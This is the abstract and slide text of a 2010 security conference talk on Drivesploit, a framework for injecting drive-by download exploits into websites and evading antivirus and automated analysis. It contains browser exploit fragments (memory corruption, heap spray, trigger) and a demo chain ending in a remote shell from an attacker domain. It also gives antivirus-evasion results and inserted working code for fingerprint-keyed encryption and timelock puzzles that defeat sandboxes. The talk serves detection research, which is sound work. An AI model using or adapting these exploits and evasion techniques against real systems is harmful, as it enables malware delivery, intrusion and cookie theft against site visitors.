Why not Anti-Virus?
• AV is to install on desktops / notebooks
• Complicated normal behavior...
Javascripts are not harmful to the environment… … so they are usually not reused
AV no good because drive-by-downloads are in:
• Disposable Ja...
Javascript Packing Is a Norm
• Packing is widely used by legitimate code!
  – To protect javascript source code
  – To red...
… OK so AV doesn't work (that well)… How about behavior-based approaches?
Defeating Behavior Analysis
1. Use VBScript
  – Exploits in VBScript
  – URL generators in VBScript
  – Exploits in ...
Defeating Behavior Analysis
3. Fingerprint-based encryption
3. Little but effective techniques...
Future Work
• Randomly chop up scripts and split into individual files
• Generating VBscript instead of ja...
Discussion
• The Panopticlick experiment by Eckersley of EFF
  – 94.2% of "typical desk...
THANK YOU!
wayne@armorize.com
@waynehuang
@drivesploit
http://www.drivesploit.org
Credits: wa...
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection

Given at Black Hat and DEF CON 2010 by Wayne Huang and team.

https://www.defcon.org/html/defcon-18/dc-18-speakers.html#Huang
http://www.blackhat.com/html/bh-us-10/bh-us-10-briefings.html#Huang

DRIVESPLOIT: CIRCUMVENTING BOTH AUTOMATED AND MANUAL DRIVE-BY-DOWNLOAD DETECTION

This year saw the biggest news in Web security ever: Operation Aurora, which aimed at stealing source code and other intellectual property and succeeded against more than 30 companies, including Google. Incident response showed that the operation involved an IE 0-day drive-by download, resulting in Google's compromise and the leak of source code to jump points in Taiwan. The US Government is so concerned that it issued a demarche to the Chinese government.

Using real, live examples, we will show how easy it is to exploit injection-based, XSS-based, and CSRF-based vulnerabilities in Facebook, Google, Digg, LinkedIn, and other popular websites, and inject drive-by downloads.

If drive-bys are so easy to inject into high-traffic websites, then the question becomes: how easy is it to make them undetectable by automated malware scanning services (such as Google's) and by human manual inspection? We will demonstrate how easy it is to defeat automated detection mechanisms and give an overview of commonly used techniques.

We will reveal for the first time, in this conference, some very advanced techniques that have been almost impossible to overcome by automated analysis in the past, are now, and will be in the future. We will release Drivesploit, a drive-by download exploit framework implemented on top of Metasploit. We will go into depth on two particular techniques supported by Drivesploit: a) javascript obfuscation based on behavior-based fingerprinting, and b) javascript timelock puzzles. We will have live demos to show how these techniques easily defeat both automated AND manual detection.

At the very beginning of our talk, we will be giving out a digg.com page which we have infected with a drive-by download created with Drivesploit. Visiting this page with the right browser will trigger the exploit and download malware that steals browser cookie files. The whole process will be undetectable by antivirus. The actual javascript drive-by code contains a secret phrase. We will give out an iPad to whoever in the audience is able to correctly deobfuscate the javascript and give out the secret phrase.

Finally, we will present case studies on systems and processes that the largest organizations have put in place in order to fight Web-based malware. We will also present case studies of our incident response efforts with organizations hit by Web malware injections, such as Google's Aurora incident. Based in Taiwan, co-speaker Wayne has been personally involved in such incident response efforts since the late '90s.

All source code related to POC exploits against Facebook, Google, Digg, LinkedIn, etc., as well as the source code of Drivesploit, will be released as open source at the conference.

Attendees will gain the following:

1. Understanding of drive-by downloads and associated terminologies.

2. Information about various drive-by download infection vectors.

3. Appreciation of tools helpful for drive-by analysis, including Malzilla, SpiderMonkey, Rhino, Burp and Wepawet

4. Realize why drive-by downloads are hard to analyze and detect: why antivirus fails, why behavior-based approaches fail, and why even manual efforts are difficult

5. Learning the Drivesploit framework and how it can be used to develop PoC drive-bys

6. Learning two new deadly techniques: behavior-based browser fingerprinting and javascript timelock puzzles

7. Learning how to implement the above two using Drivesploit to defeat both automated and manual drive-by analysis

8. Knowledge about the available countermeasures to this threat



  1. Drivesploit: Circumventing Automated and Manual Detection of Browser Exploits (掛馬免殺: planting drive-bys, evading AV). Wayne Huang, Cofounder & CTO; Fyodor Yarochkin; Antonio Rohman Fernandez; Chris Hsiao. Armorize Technologies, Inc. @waynehuang, wayne@armorize.com
  2. One type of browser exploit: drive-by downloads defined
  3. Drive-by-Download Explained • Hackers distribute malware by "poisoning" legitimate websites • Typical: injects malicious iframes into HTML content
  4. Drive-by-Download Explained • Affected websites: essentially become a delivery mechanism for malware, yet appear normal • Victims: do not need to "click" or "agree to" anything; simply connecting to the website executes the attack
  5. Drive-by Download Incidents • Aurora (Google): June 2009-Feb 2010; targeted attack; IE 0day CVE-2010-0249; confirmed publicly by Google, Adobe Systems, Juniper Networks and RackSpace; a total of 34 organizations targeted
  6. Drive-by Download Incidents • DNF666 Mass SQL Injection: since March 2010; June: Adobe 0day CVE-2010-1297; victims: Wall Street Journal, Jerusalem Post, etc.; domains: dnf666.net, robint.us, 2677.in, 4589.in, 22dnf.com
  7. CNN
  8. GameSpot
  9. US Treasury: http://thompson.blog.avg.com/2010/05/treasury-website-hacked.html
  10. PlayStation.com
  11. Washington Post
  12. Dissecting Drive-By Downloads: Page + Browser → Exploit → Payload = downloader, served by the Exploit Server
  13. Dissecting Drive-By Downloads: Page + Browser → Exploit → Payload = downloader, served by the Exploit Server. The injected script, excerpted (the %u-encoded shellcode string is omitted here): <script>var sc = unescape("[%u-encoded shellcode omitted]"); var arr = new Array; for (var i = 0; i < sss.length; i++){ arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString(); cc=cc.replace(/,/g, ""); cc = cc.replace(/@/g, ","); eval(cc); var x1 = new Array(); for (i = 0; i < 200; i++){ x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; }; var e1 = null; function ev1(evt){ e1 = document.createEventObject(evt); document.getElementById("sp1").innerHTML = ""; window.setInterval(ev2, 50); } function ev2(){ p = " …
  14. Dissecting Drive-By Downloads: Exploit! Page + Browser → Exploit → Payload = downloader, served by the Exploit Server (same injected script excerpt as slide 13)
  15. Dissecting Drive-By Downloads: Exploit! Exploits / droppers; the dropper executes; Exploit Server
  16. Dissecting Drive-By Downloads: Exploits / droppers → Exploit Server → Malware → Malware Server
  17. Dissecting Drive-By Downloads: Exploits / droppers → Exploit Server → Malware → Malware Server → Controller
  18. Dissecting Drive-By Downloads: But who would visit? The key now is TRAFFIC. Exploits / droppers → Exploit Server → Malware → Malware Server → Controller
  19. (1) Legitimate, injectable sites: URL Generators → Landing Site → Exploits / droppers → Exploit Server → Malware → Malware Server → Controller
  20. (1) Legitimate, injectable sites (same chain) • May-ongoing: DNF666 mass SQL injections • May-June: shared hosting compromise at GoDaddy, RackSpace, Network Solutions, BlueHost, DreamHost • Continuous targeted attacks
  21. (1) Legitimate, vulnerable sites (same chain) • Mass SQL injections • Mass hosting compromises • Directly inside HTML / PHP / ASP • Hidden inside WordPress files • Hidden inside the DB • Hidden inside DB stored procedures
  22. (2) Man-in-the-Middle (WAN / LAN), same chain • No tampering of the website • LAN: ARP spoofing via ZXARPS and other tools • WAN: March 2009, in the middle of the route; tw.msn.com, taiwan.cnet.com, others. Cisco advisory: http://tools.cisco.com/security/center/viewAlert.x?alertId=17778
  23. LIVE DEMO 1: http://digg.com/software/Internet_Storm_Center_Diary_2010_02_27
  24. Live demo recap
  25. Live demo recap: injected javascript in digg.com
  26. Live demo recap: 1. Inject javascript into digg.com 2. Javascript loads an iframe from our domain zcrack.org 3. Metasploit (drivesploit) is running on zcrack.org and serves the IE peers exploit 4. Bypasses AV 5. IE visitor attacked, IE crashes, meterpreter starts, jumps process to notepad.exe 6. We have a shell :)
  27. MOTIVATION: We provide solutions that monitor websites and detect malicious content 24x7. We use multiple behavior-, heuristic-, and signature-based technologies
  28. MOTIVATION: Most technologies are developed on our own, BUT we also integrate anti-virus, whose licenses are $expensive$
  29. MOTIVATION: We spend a lot of time testing our own technologies and selecting anti-virus technologies. The key is: how good are we (and they) at detecting NEW drive-by downloads
  30. MOTIVATION: We need a good framework to help us replicate, manipulate, and mutate exploits found in the wild into NEW derivatives
  31. DRIVESPLOIT IS BORN, ON TOP OF METASPLOIT
  32. INITIAL FINDINGS: ANTIVIRUS CAPABILITIES DIFFER GREATLY! DESKTOP AND API VERSIONS DIFFER GREATLY IN PERFORMANCE. COST != PERFORMANCE
  33. Antivirus vs. Drive-bys: URL Generators → Landing Site → Exploits / droppers → Exploit Server → Malware → Malware Server → Controller
  34. Antivirus vs. Drive-bys: URL Generators (JAVASCRIPT) → Landing Site (JAVASCRIPT) → Exploits / droppers (JAVASCRIPT) → Exploit Server → Malware (PE BINARY) → Malware Server → Controller
  35. Antivirus vs. Drive-bys (same chain): the JAVASCRIPT stages are the part we will detect!!
  36. Why we can't rely on PE detection • Exploit server domains are often taken down after a few days, but the injected URL generators and the exploit servers live on: attack reported to the hosting / registrar; domain banned by ISPs; purchased duration was over • We want to detect the injection so our customers can remove it • Actually, statically detecting javascript exploits is quite difficult
  37. THE TAO: ECMA-SCRIPTS: JAVASCRIPT, VBSCRIPT, ADOBE JS, ACTIONSCRIPT
  38. JAVASCRIPT!! (ECMA-SCRIPT): URL Generators → Landing Site → Exploits / droppers → Exploit Server → Malware → Malware Server → Controller
  39. JAVASCRIPT!! (ECMA-SCRIPT): URL Generators → Landing Site → Exploits / droppers → Exploit Server → Malware → Controller
  40. JAVASCRIPT!! (ECMA-SCRIPT): URL Generators → Landing Site → Exploits / droppers → Exploit Server → Controller
  41. JAVASCRIPT!! (ECMA-SCRIPT): URL Generators → Landing Site → Exploits / droppers → Exploit Server (METASPLOIT) → Controller
  42. JAVASCRIPT!! (ECMA-SCRIPT): URL Generators → Landing Site → Exploits / droppers → Exploit Server (METASPLOIT) → PAYLOAD: meterpreter (memory injection) → Controller
  43. Drive-By wants to… • Avoid detection at the victim's desktop • Avoid detection by UTM/gateways • Avoid detection by automated monitors • Live for as long as possible
  44. Drive-By wants to… CONCLUSION: Reduce exposure: serve SELECTIVELY. Avoid detection and analysis: mutate well
  45. Serve Selectively, HTTP LEVEL: serve only to • Fresh IPs (serve once per IP): set HTTP::client::onlyonce true • Particular referer (eg. Gumblar): set HTTP::referer google.com • Particular agent string (vulnerable browser): set HTTP::agent::MSIE 7.0 • Black list: set HTTP::client::blacklist false
  46. SCRIPT MUTATION: for exploit, for payload
  47. The goal is not to "obfuscate"...
  48. JAVASCRIPT EXPLOIT DISEC: Shellcode / Memory Corrupt / Heapspray / Trigger
  49. JAVASCRIPT EXPLOIT DISEC, Shellcode: <script>var shellraw = "[%u-encoded shellcode omitted]";
  50. JAVASCRIPT EXPLOIT DISEC, Memory Corrupt: var j_object = document.createElement('body'); j_object.addBehavior('#default#userData'); document.appendChild(j_object); try { for (counter=0; counter<10; counter++) { j_object.setAttribute('s',window); } } catch(e){ } window.status+='';
  51. JAVASCRIPT EXPLOIT DISEC, Heapspray (buffer overflow): var counter; var shellcode = unescape(shellraw); var memory = new Array(); var slackspace = 0x86000-(shellcode.length*2); var nops = unescape("%u0c0c%u0c0c"); while(nops.length<slackspace/2) { nops+=nops; } var fillblock = nops.substring(0,slackspace/2); delete nops; for(counter=0; counter<270; counter++) { memory[counter] = fillblock + fillblock + shellcode; }
  52. JAVASCRIPT EXPLOIT DISEC, Trigger: <button id='j_id' onclick='bootstrapper();' style='display:none'></button> … document.getElementById('j_id').onclick();
  53. JAVASCRIPT EXPLOIT DISEC: the Primitive Form (Shellcode / Memory Corrupt / Heapspray / Trigger) becomes an OBFUSCATED BLOB plus a DE-OBFUSCATOR, the Obfuscated Form
  54. Dissecting Drive-By Downloads: Exploit! Page + Browser → Exploit → Payload = downloader, served by the Exploit Server (same injected script excerpt as slide 13)
  55. JAVASCRIPT EXPLOIT DISEC: Start (Obfuscated Form: OBFUSCATED BLOB + DE-OBFUSCATOR; Primitive Form: Shellcode / Memory Corrupt / Heapspray / Trigger)
  56. JAVASCRIPT EXPLOIT DISEC: Start, Mutate (same diagram)
  57. JAVASCRIPT EXPLOIT DISEC: Start, Mutate, Prevent (same diagram)
  58. MUTATION FEATURES IMPLEMENTED SO FAR
  59. 1. Javascript Random Variable Auto Replacement • Accepts a piece of javascript • Parses the javascript according to grammar • Auto replaces all variable names and function names with random names • Passes back: a) the new javascript b) a vector of old-new name mappings
  60. 1. Javascript Random Variable Auto Replacement: randomized = Rex::Exploitation::DriveSploit::obfuscatejs(js, Rex::Exploitation::DriveSploit::AUTO_RANDOM_VARS)
  61. 2. Javascript Concat String Obfuscation: arr = Rex::Exploitation::DriveSploit.obfuscatejs(shellcode, Rex::Exploitation::DriveSploit::STRING_CONCAT); shellcode_script = arr[0]; shellcode_var = arr[1]
  62. 2. Javascript Concat String Obfuscation: %u7679%u4673%u757%u924e becomes A1 = "%u7"; A2 = "679%"; A3 = "u4673%"; A4 = "u75"; A5 = "7%u92"; A6 = "4e"; (shown beside the same assignments in shuffled order: A3, A1, A4, A5, A2, A6)
  63. 2. Javascript Concat String Obfuscation: %u7679%u4673%u757%u924e, layer 2: B1 = A1+A2; B2 = A3+A4; B3 = A5+A6; (the A assignments beside them in shuffled order)
  64. 2. Javascript Concat String Obfuscation: %u7679%u4673%u757%u924e, layer-2 names renamed and reordered: B1 = A1+A2 becomes B2 = A1+A2; B2 = A3+A4 becomes B1 = A3+A4; B3 = A5+A6 stays B3 = A5+A6
  65. 2. Javascript Concat String Obfuscation: %u7679%u4673%u757%u924e, final output: A3 = "u4673%"; A4 = "u75"; A1 = "%u7"; A5 = "7%u92"; A2 = "679%"; A6 = "4e"; B2 = A1+A2; B1 = A3+A4; B3 = A5+A6; C1=B1+B2; D1=C1+B3; // variable names are randomized
  66. 3. Javascript Random Text Insertion: insertret = Rex::Exploitation::DriveSploit.getInsertion(shellcode, 4, 6, 10); shellcode = insertret[0]; random_insertion_string = insertret[1]
  67. 3. Javascript Random Text Insertion: insertret = Rex::Exploitation::DriveSploit.getInsertion(shellcode, 4, 6, 10) # insert a fixed 6-character random string, for every 4-8 characters. Returns a) a piece of javascript containing the injected string b) the javascript variable name containing the reverted, original string
  68. 4. Numeric Literal Mutation: slackspace = Rex::Exploitation::Drivesploit.obfuscateNumber(0x86000)
  69. 4. Numeric Literal Mutation: slackspace = Rex::Exploitation::Drivesploit.obfuscateNumber(0x86000) → (246*2)+(5676*96)+(34*4)+8+(3332*1)
  70. 4. Numeric Literal Mutation: slackspace = 0x86000 becomes slackspace = (246*2)+(5676*96)+(34*4)+8+(3332*1)
  71. Trigger Prevention: Shellcode / Memory Corrupt / Heapspray / Trigger (Primitive Form) → OBFUSCATED BLOB + DE-OBFUSCATOR (Obfuscated Form); Start, Mutate, Prevent
  72. Trigger prevention • <div onload • <img onload • var a=1; var b=0; do { useless code; } while (a==b); • Fingerprinting-based encryption
  73. TESTING IT OUT: using the IE peers exploit as example, CVE-2010-0806 (MS10-018)
  74. PLAIN: 17/42
  75. RANDOM VARS: 16/42
  76. INJECT SC: 13/42
  77. RANDVAR+CONCAT SC+INJECT SC: 11/42
  78. ROUGHLY 6/17 ANTI-VIRUS DETECTS BASED ON SHELLCODE (FOR THIS EXPLOIT)
  79. CONCAT SC+CODE: 1/42
  80. INJECT SC+CONCAT CODE: 0/42
  81. RANDVAR+INJECT SC+CONCAT CODE: 0/42
  82. ANTIVIRUS DESKTOP VERSION IS MUCH STRONGER
  83. ANTIVIRUS DESKTOP VERSION • Can monitor host environment: hook into browsers; easier to get raw form of exploit • Behavior analysis: buffer overflow behavior; download-to-file behavior
  84. AntiVirus Desktop Kung Fu (columns To, Ag, Sc, Aa, Ky):
      Plain: ✖ ✖ ✔ ✔ ✔
      Random variables: ✖ ✖ ✔ ✔ ✔
      Split literals: ✖ ✖ ✔ ✔ ✔
      Injection SC: ✖ ✖ ✔ ✔ ✔
      Concat SC: ✖ ✖ ✔ ✔ ✔
      Concat CODE: ✖ ✔ ✖ ✔ ✔
      Concat SC + Concat CODE: ✖ ✖ ✖ ✔ ✔
      Inject SC + Concat CODE: ✖ ✖ ✖ ✖ ✔
  85. AntiVirus Desktop Kung Fu (columns To, Ag, Sc, Aa, Ky, M; the M column carries two marks per row as on the slide):
      Plain: ✖ ✖ ✔ ✔ ✔ ✔✔
      Random variables: ✖ ✖ ✔ ✔ ✔ ✔✔
      Split literals: ✖ ✖ ✔ ✔ ✔ ✔✔
      Injection SC: ✖ ✖ ✔ ✔ ✔ ✖✔
      Concat SC: ✖ ✖ ✔ ✔ ✔ ✖✔
      Concat CODE: ✖ ✔ ✖ ✔ ✔ ✖✔
      Concat SC + Concat CODE: ✖ ✖ ✖ ✔ ✔ ✖✔
      Inject SC + Concat CODE: ✖ ✖ ✖ ✖ ✔ ✖✔
86. LIVE DEMO 2: DESKTOP ANTIVIRUS BYPASS
87. 5. FINGERPRINTING-BASED ENCRYPTION
88. Wepawet doesn't tell much
93. Browser Feature Table (check name: IE7 / FF / Safari / Opera / Chrome)
• Is_contextmenu_event_supported: True / True / True / False / True
• String_prototype_replace_ignore_functions: False / False / True (2.0.2) / False / False
• Is_ES5_strict_mode_supported: False / False / False / False / False
• Array_prototype_slice_can_convert_to_array: False / True / True / True / True
• Getelementsbytagname_returns_comment_nodes: True / False / False / False / False
• Is_element_tagname_uppercased: True / True / True / True / True
• Is_canvas_element_supported: False / True / True / True / True
• Is_DOMFocusIn_supported: False / False / True / True / True
• Is_CSS_border_radius_supported: False / True / True / False / True
• Function_identifier_leaks_onto_enclosing_scope: True / False / False / False / False
• Script_element_rejects_textnode_appending: True / False / False / False / False
• Is_position_fixed_supported: False / True / True / False / True
• Computed_style_return_static_positioned_element: False / False / False / True / False
94. 5. Fingerprinting-Based Encryption Summary
• "This exploit works only for IE6"
• "Give me an encrypted version of my JavaScript exploit"
• "Give me JavaScript to generate the decoding key"
• "The key is only correctly generated if the JavaScript is run under IE6"
95. 5. Fingerprinting-Based Encryption Summary
Pick a subset of the feature checks as key inputs: A=Check1(); B=Check3(); C=Check4(); D=Check6(); E=Check8(); F=Check9(); G=Check12(); H=Check14();
96. 5. Fingerprinting-Based Encryption Summary
Shuffle which check feeds which key variable for each instance: A=Check6(); B=Check12(); C=Check8(); D=Check1(); E=Check4(); F=Check14(); G=Check3(); H=Check9();
97. 5. Fingerprinting-Based Encryption Summary
The shuffled assignment is the one-time key: encrypt the JavaScript exploit under it, then generate the decoding JavaScript that recomputes the key from the same checks in the visitor's browser.
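The scheme summarized on slides 94 through 97, as an added example that is not Drivesploit's own code. It models five of the slide-93 checks as probes of an environment object (in the served decoder each probe inspects the DOM or engine directly), derives the key from the check results in a per-instance order, and encrypts with RC4. The RC4 choice, the profile values taken from the slide-93 table, the expected script header and all names are this example's assumptions.

```javascript
// Added example (not Drivesploit's code): fingerprinting-based encryption.
// Server side encrypts the exploit under a key derived from browser feature
// checks; the served decoder re-derives the key from the visitor's browser.

// Feature checks from the slide-93 table, modelled as probes of an `env` object.
// A real decoder probes the engine, e.g. `"oncontextmenu" in document.documentElement`.
const CHECKS = [
  { name: "Is_contextmenu_event_supported",             probe: e => e.contextmenu },
  { name: "Array_prototype_slice_can_convert_to_array", probe: e => e.sliceConverts },
  { name: "Getelementsbytagname_returns_comment_nodes", probe: e => e.commentNodes },
  { name: "Is_canvas_element_supported",                probe: e => e.canvas },
  { name: "Is_position_fixed_supported",                probe: e => e.positionFixed },
];

// Profiles constructed from the slide-93 table for those five checks.
const PROFILES = {
  IE7:     { contextmenu: true,  sliceConverts: false, commentNodes: true,  canvas: false, positionFixed: false },
  Firefox: { contextmenu: true,  sliceConverts: true,  commentNodes: false, canvas: true,  positionFixed: true  },
  Chrome:  { contextmenu: true,  sliceConverts: true,  commentNodes: false, canvas: true,  positionFixed: true  },
  Opera:   { contextmenu: false, sliceConverts: true,  commentNodes: false, canvas: true,  positionFixed: false },
};

// Plain RC4 (key: array of byte values, data: Uint8Array). Chosen here only
// because it is short and was common in 2010-era kits; it is not a recommendation.
function rc4(key, data) {
  const S = Array.from({ length: 256 }, (_, i) => i);
  for (let i = 0, j = 0; i < 256; i++) {
    j = (j + S[i] + key[i % key.length]) & 0xff;
    [S[i], S[j]] = [S[j], S[i]];
  }
  const out = new Uint8Array(data.length);
  let i = 0, j = 0;
  for (let k = 0; k < data.length; k++) {
    i = (i + 1) & 0xff;
    j = (j + S[i]) & 0xff;
    [S[i], S[j]] = [S[j], S[i]];
    out[k] = data[k] ^ S[(S[i] + S[j]) & 0xff];
  }
  return out;
}

// Per-instance random check order (slide 96): the same target gets a different
// key and ciphertext on every visit, which is what defeats static signatures.
function randomOrder(n) {
  const order = Array.from({ length: n }, (_, i) => i);
  for (let i = n - 1; i > 0; i--) {
    const j = Math.floor(Math.random() * (i + 1));
    [order[i], order[j]] = [order[j], order[i]];
  }
  return order;
}

// Key = check results in the instance order, one byte ('1' or '0') per check.
function deriveKey(order, env) {
  return order.map(i => (CHECKS[i].probe(env) ? 0x31 : 0x30));
}

const enc = new TextEncoder();
const dec = new TextDecoder();

// Server side: encrypt the exploit for the target profile.
function encryptForTarget(script, targetEnv, order) {
  return rc4(deriveKey(order, targetEnv), enc.encode(script));
}

// Client side (the generated decoding JavaScript): re-derive the key and decrypt.
// Returns null when the plaintext lacks the expected header, i.e. when the
// visiting browser's feature set differs from the target's.
function decodeInBrowser(blob, env, order) {
  const text = dec.decode(rc4(deriveKey(order, env), blob));
  return text.startsWith("/*exploit*/") ? text : null;
}
```

Two properties follow directly from the construction. First, the key carries at most one bit per check, so with the 14 checks of slide 93 an analyzer that already holds the decoder can enumerate all 2^14 outcomes offline; what the scheme really buys is that emulators which do not reproduce the engine quirks never hit the right key. Second, browsers that agree on every chosen check share a key: on the five checks above Firefox and Chrome are indistinguishable, so a payload encrypted for one decrypts in the other, which is why the check subset has to be chosen to separate the target from everything else.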
98. Why not Anti-Virus?
• AV is installed on desktops / notebooks
• Complicated normal behaviors
• Strict resource constraints
• Therefore, AV and gateway vendors rely on:
– Signature-based pattern-matching technologies
– LIGHTWEIGHT and ACCURATE
• Why can't such technology be used to detect drive-by downloads?
99. JavaScripts are not harmful to the environment…
100. … so they are usually not reused. AV is no good because drive-by downloads are in:
• Disposable JavaScript
• Disposable PDF (Adobe JS)
• Disposable Flash ActionScript
• All ECMAScripts, which you don't usually reuse…
101. JavaScript Packing Is the Norm
• Packing is widely used by legitimate code!
– To protect JavaScript source code
– To reduce JavaScript size
• Google Closure Compiler: http://code.google.com/closure/compiler/
• Yahoo JavaScript Packer (YUI Compressor): http://developer.yahoo.com/yui/compressor/
• Advanced HTML Protector: http://www.creabit.com/htmlprotect/
• Dean Edwards' Packer: http://dean.edwards.name/packer/
• Online JS Obfuscator: http://www.iwebtool.com/html_encrypter
• http://www.cha88.cn/safe/fromCharCode.php
102. … OK, so AV doesn't work (that well)… How about behavior-based approaches?
103. Defeating Behavior Analysis
1. Use VBScript
– Exploits in / generated by VBScript
– URL generators in VBScript
– May defeat SpiderMonkey et al. (Rhino, JSUnpack, etc.)
2. Don't serve to detectors
– You can't detect what you don't have
– Serve to each IP only once
– Detect agent strings
– Collect robot IPs: Google, Yahoo, security vendors
104. Defeating Behavior Analysis
3. Fingerprint-based encryption
4. Little but effective techniques
– Sleep(30000); // using setTimeout
– Timelock puzzles
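The timelock puzzle from slide 104, as an added example that is not Drivesploit's code. It follows the Rivest-Shamir-Wagner construction: the page generator, which knows the factors of N, computes g^(2^t) mod N in a few modular exponentiations, while the served decoder has to perform t sequential squarings that cannot be parallelised, so a sandbox with a short analysis budget times out before the real key is unmasked. The toy primes, t, the 4-byte key and the function names are this example's choices.

```javascript
// Added example (not Drivesploit's code): an RSW-style time-lock puzzle used as
// an analysis delay. Generator side is instant; visitor side costs t squarings.

const P = 104729n, Q = 1299709n;     // toy primes; a real puzzle uses a 1024-bit+ N
const N = P * Q;
const PHI = (P - 1n) * (Q - 1n);
const G = 2n;                        // gcd(G, N) = 1 since both primes are odd

// Square-and-multiply modular exponentiation on BigInt.
function modPow(base, exp, mod) {
  let result = 1n, b = base % mod, e = exp;
  while (e > 0n) {
    if (e & 1n) result = (result * b) % mod;
    b = (b * b) % mod;
    e >>= 1n;
  }
  return result;
}

// Generator side: g^(2^t) mod N via Euler's theorem, cost ~ log2(t) + log2(phi)
// multiplications, because the generator knows phi(N).
function puzzleAnswerFast(t) {
  const e = modPow(2n, BigInt(t), PHI);
  return modPow(G, e, N);
}

// Visitor side (what the served decoder must run): t sequential squarings.
// Nothing in this loop can be split across cores; wall-clock time is the point.
function puzzleAnswerSlow(t) {
  let x = G % N;
  for (let i = 0; i < t; i++) x = (x * x) % N;
  return x;
}

// Little-endian low bytes of the puzzle answer, used as a one-time mask.
function puzzleKeyBytes(answer, length) {
  const bytes = [];
  let v = answer;
  for (let i = 0; i < length; i++) { bytes.push(Number(v & 0xffn)); v >>= 8n; }
  return bytes;
}

// The real decryption key is XORed with the mask; the page ships `locked`, t and N,
// and the decoder can only recover `key` after doing the t squarings itself.
function lockKey(keyBytes, t) {
  const mask = puzzleKeyBytes(puzzleAnswerFast(t), keyBytes.length);
  return keyBytes.map((b, i) => b ^ mask[i]);
}
function unlockKey(lockedBytes, t) {
  const mask = puzzleKeyBytes(puzzleAnswerSlow(t), lockedBytes.length);
  return lockedBytes.map((b, i) => b ^ mask[i]);
}
```

With a real-sized N the attacker tunes t so a visitor's browser needs, say, thirty seconds, which no amount of sandbox hardware shortens; the defender's options are a generous timeout, or recognising the squaring loop and patching t down before emulation. Unlike the setTimeout sleep on slide 104, the puzzle cannot be skipped by hooking the timer.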
105. Future Work
• Randomly chop up scripts and split them into individual files
• Generate VBScript instead of JavaScript
• Encrypt using data that exists outside of the HTML
– HTTP headers
106. Discussion
• The Panopticlick experiment by Eckersley of EFF
– 94.2% of "typical desktop browsers" are unique
• Can fingerprinting-based encryption be integrated with this type of individual fingerprinting, to prevent detection and analysis of targeted attacks?
107. THANK YOU! wayne@armorize.com, @waynehuang, @drivesploit, http://www.drivesploit.org
Credits: Wayne Huang, Fyodor Yarochkin, Antonio Rohman Fernandez
Special thanks to: Benson Wu, Jeremy Chiu, Kuon Ding, Cola Ding, Felix
108. References
• James Lee, Using guided missiles in drive-bys: automatic browser fingerprinting and exploitation with the Metasploit Framework's browser_autopwn: http://www.slideshare.net/egypt/using-guided-missiles-in-drivebys-automatic-browser-fingerprinting-and-exploitation-with-the-metasploit-frameworks-browser-autopwn
• Sebastian Porst, How to really obfuscate your PDF malware: http://www.slideshare.net/cblichmann/how-to-really-obfuscate-your-pdf-malware
• Jeremy Chiu, 0box analyzer: afterdark runtime forensics for automated malware analysis and clustering: http://www.slideshare.net/wayne_armorize/0-box-analyzer-afterdark-runtime-forensics-for-automated-malware-analysis-and-clustering-2
• HeapLib support added to Metasploit 3: http://blog.metasploit.com/2007/04/heaplib-support-added-to-metasploit-3.html
